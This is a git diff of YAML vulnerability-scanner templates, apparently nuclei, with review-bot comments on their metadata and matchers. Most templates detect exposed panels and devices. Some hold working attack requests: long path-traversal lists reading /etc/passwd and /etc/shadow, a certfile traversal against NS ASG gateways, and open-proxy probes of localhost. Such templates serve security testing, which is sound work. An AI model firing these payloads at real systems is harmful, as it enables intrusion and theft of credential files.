81893c03f8..d42d8c1648 100644 --- a/poc/other/jmx-console-8351.yaml +++ b/poc/other/jmx-console-8351.yaml @@ -1,9 +1,9 @@ id: jmx-console info: name: JMX Console - author: yashanand155 + author: Yash Anand @yashanand155 severity: low - tags: panel,jmx + tags: panel requests: - method: GET diff --git a/poc/other/jolokia.yaml b/poc/other/jolokia.yaml index 5864d45b30..847ba584d9 100644 --- a/poc/other/jolokia.yaml +++ b/poc/other/jolokia.yaml @@ -1,15 +1,13 @@ id: jolokia-instance - info: name: Jolokia Version Disclosure - author: mavericknerd & dwisiswant0 - severity: low - + author: mavericknerd,dwisiswant0 + severity: info + tags: tech,jolokia requests: - method: GET path: - '{{BaseURL}}/jolokia/version' - - '{{BaseURL}}:8080/jolokia/version' matchers-condition: and matchers: - type: word 
diff --git a/poc/other/landray-oa-fileread-8569.yaml b/poc/other/landray-oa-fileread-8569.yaml old mode 100755 new mode 100644 diff --git a/poc/other/lazy-file-8607.yaml b/poc/other/lazy-file-8607.yaml index 86c95e88c3..15bca2c8c7 100644 --- a/poc/other/lazy-file-8607.yaml +++ b/poc/other/lazy-file-8607.yaml @@ -1,17 +1,26 @@ id: lazy-file-manager + info: name: Lazy File Manager author: amsda severity: medium -requests: + description: lfm.php file in exposed in Lazy File Manager. + metadata: + max-request: 1 + tags: exposure + +http: - method: GET path: - "{{BaseURL}}/lfm.php" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - Lazy File Manager +# digest: 4b0a00483046022100b54a4c899dd57c9e24da25ed4b5d8a4e57da0c55d202912808bf996cf590ef2f022100be48666d3f536cda624ca329e04edfe66e3606e351a5d1d88eb047bb6c91e4ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/liveview-axis-camera.yaml b/poc/other/liveview-axis-camera.yaml index e7342904ad..2f1e20973e 100644 --- a/poc/other/liveview-axis-camera.yaml +++ b/poc/other/liveview-axis-camera.yaml @@ -1,19 +1,23 @@ id: liveview-axis-camera info: - name: Live view AXIS Network Camera + name: Live View AXIS Network Camera author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6843 - tags: iot + tags: iot,axis,network requests: - method: GET path: - '{{BaseURL}}/view/viewer_index.shtml' - matchers-condition: and + matchers-condition: or matchers: - - type: word - words: - - 'Live view - AXIS' - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(tolower(body), "live view - axis")' + condition: and + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(tolower(body), "/incl/axis_connection.js")' + condition: and diff --git a/poc/other/local-file-inclusion.yaml b/poc/other/local-file-inclusion.yaml index 1fd7854389..09b46ce63d 100644 --- a/poc/other/local-file-inclusion.yaml 
+++ b/poc/other/local-file-inclusion.yaml 
@@ -1,70 +1,67 @@ + id: LFI info: name: Local File Inclusion - author: 0x71rex + author: pikpikcu severity: high requests: - method: GET path: - - '{{BaseURL}}/etc/shells' + - '{{BaseURL}}/etc/passwd' - '{{BaseURL}}/etc/shadow%00' - - '{{BaseURL}}/etc/shells' - - '{{BaseURL}}/etc/shells%00' - - '{{BaseURL}}../etc/shells' - - '{{BaseURL}}../etc/shells%00' - - '{{BaseURL}}../../etc/shells' - - '{{BaseURL}}../../etc/shells%00' - - '{{BaseURL}}../../../etc/shells' - - '{{BaseURL}}../../../etc/shells%00' - - '{{BaseURL}}../../../../etc/shells' - - '{{BaseURL}}../../../../etc/shells%00' - - '{{BaseURL}}../../../../../etc/shells' - - '{{BaseURL}}../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/shells' - - 
'{{BaseURL}}../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shells%00' + - '{{BaseURL}}/etc/passwd' + - '{{BaseURL}}/etc/passwd%00' + - '{{BaseURL}}../etc/passwd' + - '{{BaseURL}}../etc/passwd%00' + - '{{BaseURL}}../../etc/passwd' + - '{{BaseURL}}../../etc/passwd%00' + - '{{BaseURL}}../../../etc/passwd' + - '{{BaseURL}}../../../etc/passwd%00' + - '{{BaseURL}}../../../../etc/passwd' + - '{{BaseURL}}../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../etc/passwd' + - '{{BaseURL}}../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../etc/passwd%00' + - 
'{{BaseURL}}../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd' + - 
'{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00' - - '{{BaseURL}}../../../../../../etc/shells&=%3C%3C%3C%3C' + - '{{BaseURL}}../../../../../../etc/passwd&=%3C%3C%3C%3C' matchers: - - type: word - words: - - "# valid login shells" - - "/bin/sh" - - "/bin/ash" - - "/bin/bash" - condition: and + - type: regex + regex: + - "root:[x*]:0:0:" part: body diff --git a/poc/other/manageengine-adaudit-8729.yaml b/poc/other/manageengine-adaudit-8729.yaml index 377dd9e8d5..e2de7755dd 100644 --- a/poc/other/manageengine-adaudit-8729.yaml +++ b/poc/other/manageengine-adaudit-8729.yaml @@ -1,21 +1,24 @@ id: manageengine-adaudit + info: name: ZOHO ManageEngine ADAudit/ADManager Panel author: dhiyaneshDK,PR3R00T severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22 + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22 tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}' - "{{BaseURL}}/authorization.do" + matchers-condition: and matchers: - type: word words: - 'ManageEngine - ADManager Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/manageengine-adselfservice-8737.yaml b/poc/other/manageengine-adselfservice-8737.yaml index 7362411b83..6532736e50 100644 --- a/poc/other/manageengine-adselfservice-8737.yaml +++ b/poc/other/manageengine-adselfservice-8737.yaml 
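Review bot: In local-file-inclusion.yaml, the two `/etc/shadow%00` paths kept as context lines will in general not satisfy the new matcher `root:[x*]:0:0:`, which describes a passwd-style entry. Those requests add traffic against the target without being able to produce a finding. The request also has no `stop-at-first-match: true`, so each of the roughly fifty paths is sent even after one has matched; apc-info.yaml in this same commit adds that key for a list of two. I would drop the shadow entries and add `stop-at-first-match: true` under the request. The `info` block still has no `tags` or `description`.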
@@ -1,23 +1,20 @@ id: manageengine-adselfservice - info: name: ZOHO ManageEngine ADSelfService Plus author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 tags: panel,zoho,manageengine - requests: - method: GET path: - '{{BaseURL}}/authorization.do' - matchers-condition: and matchers: - type: word words: - 'ADSelfService Plus' - - type: status status: - 200 diff --git a/poc/other/manageengine-analytics.yaml b/poc/other/manageengine-analytics.yaml index 88eba95c38..913172962a 100644 --- a/poc/other/manageengine-analytics.yaml +++ b/poc/other/manageengine-analytics.yaml @@ -1,20 +1,24 @@ id: manageengine-analytics + info: name: ZOHO ManageEngine Analytics Plus author: dhiyaneshDK severity: info - reference: - - https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D + metadata: + fofa-query: app="ZOHO-流量管理" tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}/iam/login' + matchers-condition: and matchers: - type: word words: - 'ManageEngine Analytics Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/manageengine-assetexplorer-8757.yaml b/poc/other/manageengine-assetexplorer-8757.yaml index 5624722829..04adb8708c 100644 --- a/poc/other/manageengine-assetexplorer-8757.yaml +++ b/poc/other/manageengine-assetexplorer-8757.yaml @@ -3,8 +3,7 @@ info: name: ZOHO ManageEngine AssetExplorer author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 tags: panel,zoho,manageengine requests: - method: GET diff --git a/poc/other/manageengine-desktop-8762.yaml b/poc/other/manageengine-desktop-8762.yaml index 503b3dc94e..310ef954d9 100644 
--- a/poc/other/manageengine-desktop-8762.yaml +++ b/poc/other/manageengine-desktop-8762.yaml @@ -1,20 +1,23 @@ id: manageengine-desktop + info: name: ZOHO ManageEngine Desktop author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22 + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22 tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}/configurations' + matchers-condition: and matchers: - type: word words: - 'ManageEngine Desktop Central 10' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/mautic-crm-panel.yaml b/poc/other/mautic-crm-panel.yaml index 8efd21e520..2671f8dff5 100644 --- a/poc/other/mautic-crm-panel.yaml +++ b/poc/other/mautic-crm-panel.yaml @@ -1,15 +1,20 @@ id: mautic-crm-panel + info: name: Mautic CRM Panel Login author: cyllective,daffainfo severity: info - description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms, questionnaires, reports, etc. - reference: https://github.com/mautic/mautic + description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms, + questionnaires, reports, etc. + reference: + - https://github.com/mautic/mautic tags: tech,mautic,crm + requests: - method: GET path: - "{{BaseURL}}/s/login" + matchers-condition: and matchers: - type: word @@ -18,6 +23,7 @@ requests: - 'Mautic' - 'var mauticBasePath' condition: and + - type: status status: - 200 diff --git a/poc/other/metabase-panel.yaml b/poc/other/metabase-panel.yaml index b06f3bb0a0..a897496550 100644 --- a/poc/other/metabase-panel.yaml +++ b/poc/other/metabase-panel.yaml 
@@ -1,25 +1,21 @@ id: metabase-panel - info: name: Metabase Login Panel author: revblock,daffainfo - severity: info description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source metadata: shodan-query: http.title:"Metabase" + severity: info tags: panel,metabase,login - requests: - method: GET path: - "{{BaseURL}}/auth/login" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: @@ -27,7 +23,6 @@ requests: - "window.MetabaseBootstrap" - "window.MetabaseRoot" condition: and - extractors: - type: regex part: body diff --git a/poc/other/mikrotik-routeros.yaml b/poc/other/mikrotik-routeros.yaml index 878d13146a..93481765df 100644 --- a/poc/other/mikrotik-routeros.yaml +++ b/poc/other/mikrotik-routeros.yaml @@ -1,15 +1,17 @@ id: mikrotik-routeros + info: name: MikroTik RouterOS Login author: gy741 severity: info - reference: - - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe + reference: https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe tags: panel,login + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word diff --git a/poc/other/mobotix-guest-camera-8911.yaml b/poc/other/mobotix-guest-camera-8911.yaml index 67f209bbb0..c1948d9506 100644 --- a/poc/other/mobotix-guest-camera-8911.yaml +++ b/poc/other/mobotix-guest-camera-8911.yaml @@ -1,11 +1,12 @@ id: mobotix-guest-camera + info: name: MOBOTIX Guest Camera author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/6848 + reference: https://www.exploit-db.com/ghdb/6848 tags: iot + requests: - method: GET path: diff --git a/poc/other/netscaler-gateway-9052.yaml b/poc/other/netscaler-gateway-9052.yaml index 0f006101d3..a627e50ace 100644 --- a/poc/other/netscaler-gateway-9052.yaml 
+++ b/poc/other/netscaler-gateway-9052.yaml @@ -1,10 +1,15 @@ id: netscaler-gateway - info: - name: Netscaler gateway + name: Netscaler Gateway author: joeldeleep severity: info - + description: Citrix NetScaler is an application delivery controller that improves the delivery speed and quality of applications to an end user. + reference: + - https://stack.watch/product/citrix/netscaler-gateway/ + classification: + cwe-id: CWE-200 + remediation: Ensure proper access. + tags: panel,netscaler requests: - method: GET path: @@ -13,3 +18,5 @@ requests: - type: word words: - Netscaler Gateway + +# Enhanced by mp on 2022/02/09 diff --git a/poc/other/nextcloud-install-9085.yaml b/poc/other/nextcloud-install-9085.yaml index cfdb474024..470fee01e3 100644 --- a/poc/other/nextcloud-install-9085.yaml +++ b/poc/other/nextcloud-install-9085.yaml @@ -1,4 +1,5 @@ id: nextcloud-install + info: name: Nextcloud Exposed Installation author: skeltavik @@ -6,11 +7,15 @@ info: reference: - https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html tags: tech,nextcloud,storage -requests: + metadata: + max-request: 1 + +http: - method: GET path: - '{{BaseURL}}' - redirects: true + + host-redirects: true max-redirects: 2 matchers-condition: and matchers: @@ -20,6 +25,7 @@ requests: - '
Create an admin account' - 'Storage & database' condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/ns-asg-file-read-9151.yaml b/poc/other/ns-asg-file-read-9151.yaml index b7b4daf1b7..e071092773 100644 --- a/poc/other/ns-asg-file-read-9151.yaml +++ b/poc/other/ns-asg-file-read-9151.yaml @@ -1,36 +1,18 @@ id: nsasg-arbitrary-file-read info: - name: NS ASG - Local File Inclusion - author: pikpikcu,ritikchaddha + name: NS ASG Arbitrary File Read + author: pikpikcu severity: high - description: NS ASG is vulnerable to local file inclusion. - reference: - - https://zhuanlan.zhihu.com/p/368054963 - - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md - metadata: - fofa-query: app="网康科技-NS-ASG安全网关" - shodan-query: http.title:“NS-ASG” - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: nsasg,lfi requests: - method: GET path: - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" - - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0:" - - type: word - part: body - words: - - "$certfile" - - "application/pdf" - condition: and - -# Enhanced by mp on 2022/08/03 + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/other/ntlm-directories-9155.yaml b/poc/other/ntlm-directories-9155.yaml index 839d67428e..c84e9f1e62 100644 --- a/poc/other/ntlm-directories-9155.yaml +++ b/poc/other/ntlm-directories-9155.yaml 
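Review bot: The new side of poc/other/ns-asg-file-read-9151.yaml drops the `description`, both `reference` links and the `classification` block (CVSS 7.5, CWE-22) while keeping `severity: high`, so a finding from this template no longer carries what a triager needs to confirm or prioritise it. Keep those `info` fields alongside the matcher change. The new regex matcher also has no `part:` key; adding `part: body` documents where the passwd line is expected.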
@@ -1,68 +1,75 @@ id: ntlm-directories - info: name: Discovering directories w/ NTLM - author: puzzlepeaches + author: puzzlepeaches,incogbyte severity: info - tags: misc - + reference: + - https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 + tags: misc,fuzz,windows requests: - - method: GET - path: - - "{{BaseURL}}/abs/" - - "{{BaseURL}}/adfs/services/trust/2005/windowstransport" - - "{{BaseURL}}/aspnet_client/" - - "{{BaseURL}}/autodiscover/" - - "{{BaseURL}}/autoupdate/" - - "{{BaseURL}}/certenroll/" - - "{{BaseURL}}/certprov/" - - "{{BaseURL}}/certsrv/" - - "{{BaseURL}}/conf/" - - "{{BaseURL}}/deviceupdatefiles_ext/" - - "{{BaseURL}}/deviceupdatefiles_int/" - - "{{BaseURL}}/dialin/" - - "{{BaseURL}}/ecp/" - - "{{BaseURL}}/etc/" - - "{{BaseURL}}/ews/" - - "{{BaseURL}}/exchange/" - - "{{BaseURL}}/exchweb/" - - "{{BaseURL}}/groupexpansion/" - - "{{BaseURL}}/hybridconfig/" - - "{{BaseURL}}/mcx/" - - "{{BaseURL}}/mcx/mcxservice.svc" - - "{{BaseURL}}/meet/" - - "{{BaseURL}}/meeting/" - - "{{BaseURL}}/microsoft-server-activesync/" - - "{{BaseURL}}/oab/" - - "{{BaseURL}}/ocsp/" - - "{{BaseURL}}/owa/" - - "{{BaseURL}}/persistentchat/" - - "{{BaseURL}}/phoneconferencing/" - - "{{BaseURL}}/powershell/" - - "{{BaseURL}}/public/" - - "{{BaseURL}}/reach/sip.svc" - - "{{BaseURL}}/requesthandler/" - - "{{BaseURL}}/requesthandlerext/" - - "{{BaseURL}}/rgs/" - - "{{BaseURL}}/rgsclients/" - - "{{BaseURL}}/rpc/" - - "{{BaseURL}}/rpcwithcert/" - - "{{BaseURL}}/scheduler/" - - "{{BaseURL}}/ucwa/" - - "{{BaseURL}}/unifiedmessaging/" - - "{{BaseURL}}/webticket/" - - "{{BaseURL}}/webticket/webticketservice.svc" - - "{{BaseURL}}/webticket/webticketservice.svcabs/" - + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + threads: 10 + payloads: + path: + - / + - /abs/ + - /ecp/ + - /etc/ + - /ews/ + - /mcx/ + - /oab/ + - /owa/ + - /rgs/ + - /rpc/ + - /conf/ + - 
/meet/ + - /ocsp/ + - /ucwa/ + - /adfs/ + - /dialin/ + - /public/ + - /certsrv/ + - /exchweb/ + - /meeting/ + - /certprov/ + - /exchange/ + - /scheduler/ + - /webticket/ + - /autoupdate/ + - /certenroll/ + - /powershell/ + - /rgsclients/ + - /rpcwithcert/ + - /autodiscover/ + - /hybridconfig/ + - /reach/sip.svc + - /aspnet_client/ + - /groupexpansion/ + - /persistentchat/ + - /requesthandler/ + - /unifiedmessaging/ + - /mcx/mcxservice.svc + - /phoneconferencing/ + - /requesthandlerext/ + - /deviceupdatefiles_ext/ + - /deviceupdatefiles_int/ + - /microsoft-server-activesync/ + - /webticket/webticketservice.svc + - /webticket/webticketservice.svcabs/ + - /adfs/services/trust/2005/windowstransport matchers-condition: and matchers: - - type: word - words: - - "WWW-Authenticate: NTLM" - - "Www-Authenticate: NTLM" - part: header - condition: or - + - type: dsl + dsl: + - "contains(tolower(all_headers), 'www-authenticate: ntlm')" - type: status status: - 401 + extractors: + - type: kval + kval: + - 'www_authenticate' diff --git a/poc/other/nuuo-file-inclusion-9168.yaml b/poc/other/nuuo-file-inclusion-9168.yaml index a753b1dac4..2a29674630 100644 --- a/poc/other/nuuo-file-inclusion-9168.yaml +++ b/poc/other/nuuo-file-inclusion-9168.yaml @@ -1,10 +1,9 @@ id: nuuo-file-inclusion info: - name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval + name: NUUO NVRmini 2 3.0.8 Local File Disclosure author: princechaddha severity: high - reference: - - https://www.exploit-db.com/exploits/40211 + reference: https://www.exploit-db.com/exploits/40211 tags: nuuo,lfi requests: - method: GET diff --git a/poc/other/old-copyright.yaml b/poc/other/old-copyright.yaml index a1cdb7e7e1..6c401649d9 100644 --- a/poc/other/old-copyright.yaml +++ b/poc/other/old-copyright.yaml 
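Review bot: The `Authorization: NTLM TlRMTVNTUAAB...` value in the new raw request is undocumented. It decodes to an NTLMSSP negotiate (type 1) message and carries no credentials, so a comment above `- raw:` such as `# NTLM type 1 negotiate message, no credentials; elicits the server challenge` would save the next reader from decoding it. The payload entry `/webticket/webticketservice.svcabs/` looks like two paths fused together (it was already in the removed list) and is worth checking against the intended path. The new `kval` extractor puts the `www_authenticate` value into results, so a `description` noting that output may include internal host and domain names would help whoever handles the reports.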
@@ -1,13 +1,16 @@ id: old-copyright + info: name: Find pages with old copyright dates author: geeknik severity: info tags: misc + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 3 matchers-condition: and @@ -17,6 +20,7 @@ requests: - '2021' part: body negative: true + - type: regex part: body regex: diff --git a/poc/other/open-mjpg-streamer.yaml b/poc/other/open-mjpg-streamer.yaml index a00ea8360c..07826b437c 100644 --- a/poc/other/open-mjpg-streamer.yaml +++ b/poc/other/open-mjpg-streamer.yaml @@ -1,16 +1,18 @@ id: open-mjpg-streamer + info: name: open-mjpg-streamer author: gboddin severity: medium - description: Open mjpg-streamer service sharing webcam/camera feed - reference: - - https://github.com/jacksonliam/mjpg-streamer + reference: https://github.com/jacksonliam/mjpg-streamer tags: iot,webcam + description: Open mjpg-streamer service sharing webcam/camera feed + requests: - method: GET path: - "{{BaseURL}}/?action=stream" + max-size: 2048 matchers-condition: and matchers: @@ -18,6 +20,7 @@ requests: words: - 'MJPG-Streamer/0.2' part: header + - type: status status: - 200 diff --git a/poc/other/open-proxy-localhost.yaml b/poc/other/open-proxy-localhost.yaml index 25fad3bb8f..30cf9f22c6 100644 --- a/poc/other/open-proxy-localhost.yaml +++ b/poc/other/open-proxy-localhost.yaml @@ -5,7 +5,7 @@ info: severity: high tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to web ports on the host's internal interface. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy 
@@ -16,30 +16,24 @@ info: cwe-id: CWE-441 requests: - raw: - - |+ + - | GET / HTTP/1.1 Host: {{Hostname}} - - - |+ + - | GET http://somethingthatdoesnotexist/ HTTP/1.1 Host: somethingthatdoesnotexist - - - |+ + - | GET http://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - - |+ + - | GET https://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - - |+ + - | GET http://localhost/ HTTP/1.1 Host: localhost - - - |+ + - | GET https://localhost/ HTTP/1.1 Host: localhost - unsafe: true req-condition: true stop-at-first-match: true @@ -57,3 +51,4 @@ requests: - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works")) +# Enhanced by cs on 2022/02/14 diff --git a/poc/other/open-proxy-portscan.yaml b/poc/other/open-proxy-portscan.yaml index 28baa02253..387bf7f087 100644 --- a/poc/other/open-proxy-portscan.yaml +++ b/poc/other/open-proxy-portscan.yaml @@ -3,9 +3,7 @@ info: name: Open Proxy to Ports on the Proxy's localhost Interface author: sullo severity: high - tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to its internal interface - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy 
@@ -14,6 +12,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. + tags: exposure,config,proxy,misconfig,fuzz requests: - raw: - |+ @@ -59,4 +59,4 @@ requests: - (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6)) - (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8))) -# Updated by Chris on 2022/01/21 +# Enhanced by cs on 2022/01/21 diff --git a/poc/other/openam-workflow.yaml b/poc/other/openam-workflow.yaml index 421ca20fb0..afa92cc956 100644 --- a/poc/other/openam-workflow.yaml +++ b/poc/other/openam-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all OpenAM related nuclei templates on a given target. workflows: - - template: technologies/openam-detect.yaml + - template: exposed-panels/openam-panel.yaml subtemplates: - tags: openam diff --git a/poc/other/otobo-panel-9412.yaml b/poc/other/otobo-panel-9412.yaml index ea051f5552..bc2b7fcd8e 100644 --- a/poc/other/otobo-panel-9412.yaml +++ b/poc/other/otobo-panel-9412.yaml 
@@ -1,24 +1,34 @@ id: otobo-panel + info: - name: OTOBO Login Panel + name: OTOBO Login Panel - Detect author: princechaddha severity: info - description: OTOBO is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. + description: OTOBO login panel was detected. reference: - https://github.com/rotheross/otobo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"otobo" tags: panel,otobo + requests: - method: GET path: - "{{BaseURL}}/otobo/index.pl" + matchers-condition: and matchers: - type: regex part: body regex: - "(.*)OTOBO(.*)" + - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/poc/other/panabit-panel-9445.yaml b/poc/other/panabit-panel-9445.yaml index ca065c8f6b..261430cced 100644 --- a/poc/other/panabit-panel-9445.yaml +++ b/poc/other/panabit-panel-9445.yaml @@ -1,4 +1,5 @@ id: panabit-panel + info: 